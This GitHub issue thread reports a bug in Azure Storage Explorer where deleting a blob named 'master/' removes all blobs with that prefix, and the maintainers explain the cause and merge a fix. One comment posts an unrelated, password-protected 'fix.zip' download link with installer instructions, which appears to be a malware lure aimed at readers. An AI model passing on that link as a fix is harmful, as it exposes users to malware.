### ISSUE TITLE
Deleting blob with only virtual folder prefix name results in deletion of all prefaced blobs

### ISSUE THREAD

**Issue by riverar** [microsoft/AzureStorageExplorer#8148]
### Preflight Checklist

- [X] I have installed the [latest version of Storage Explorer](https://github.com/Microsoft/AzureStorageExplorer/releases/latest).
- [X] I have checked existing resources, including the [troubleshooting guide](https://docs.microsoft.com/azure/storage/common/storage-explorer-troubleshooting) and the [release notes](https://github.com/microsoft/AzureStorageExplorer/releases).
- [X] I have searched for [similar issues](https://github.com/Microsoft/AzureStorageExplorer/issues).

### Storage Explorer Version

1.35.0 (100)

### Architecture

x64

### Storage Explorer Build Number

20240810.1

### Platform

Windows

### OS Version

Windows vNext 27686.rs_prerelease.240809-2254

### Bug Description

Adding a blob named `master/` to a container confuses Azure Storage Explorer, resulting in a hierarchy that appears as such:

```
(folder) master/
├─ (blob) master/
├─ (blob) master/blob1
├─ (blob) master/blob2
```

Attempting to delete the `master/` blob results in all blobs with the `master/` prefix getting deleted, except the `master/` blob itself. That cannot be deleted via Azure Storage Explorer, require manual intervention.

### Steps to Reproduce

1. Create a Blob Container
2. Upload a blob named `master/test1`
3. Upload a blob named `master/test2`
4. Upload a blob named `master/`
5. Close/reopen Blob Container tab
6. Observe a `master/` **folder** is visible. Open it.
7. Observe three blobs as created earlier.
8. Delete the `master/` blob and refresh.
9. Observe other blobs were deleted.

### Actual Experience

Non-selected blobs were deleted

### Expected Experience

I understand folders don't exist, so it's a bit tricky to discern between a user wanting to wipe out a "folder" vs. this errant blob. I suggest detecting blobs without names and show them in the child folder as `(unnamed)` or similar, for differentiation at delete time.

### Additional Context

Retrieving and deleting this blob manually via Az PowerShell works fine.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JasonYeMSFT** [comment]
@riverar This is a limitation of AzCopy. Storage Explorer issues delete commands to AzCopy for deleting blobs. In the command, the resource names are put in urls and unfortunately AzCopy doesn't have a way to distinguish between blob prefixes and blobs that happens to have identical names.

I know Azure Portal show such blobs/prefixes as `<no name>` but we decided not to do that because there is no way for people to distinguish them from blobs/prefixes that are literally named `<no name>`. We can help mitigate the issue by fix the display name of the blob by showing an empty string. However, this is not a high priority task for us because blob names that end with `/` should be avoided. https://learn.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#blob-names

**Comment by riverar** [comment]
@jasonyemsft Thanks for looking into this; that makes sense to me. (Given the potential unexpected data loss, I believe you may want to reconsider the priority.)

**Comment by MRayermannMSFT** [comment]
@riverar two questions:
1. How did you do "Upload a blob named master/"?
2. What prompted you to open this issue/why are you doing uploads of blobs whose names ends with a `/`?

**Comment by riverar** [comment]
@MRayermannMSFT It was an accident; I was using `Set-AzStorageBlobContent -Blob "$branchName/$fileName"` and the latter variable was blank. I then went to clean up my mistake and wiped all the blobs out, which sent me here.

(It's unclear why Azure Storage hasn't created a simple GitHub Action for common blob scenarios.)

**Comment by JasonYeMSFT** [comment]
I merged a change to make sure we show the correct name (an empty string) for such blobs. In Storage Explorer, we check for empty string names and disable the delete action. If you accidentally created them and need to delete them, you will need to use other tools that support this scenario instead.

**Comment by riverar** [comment]
Sounds great, thanks all! Will try it out.
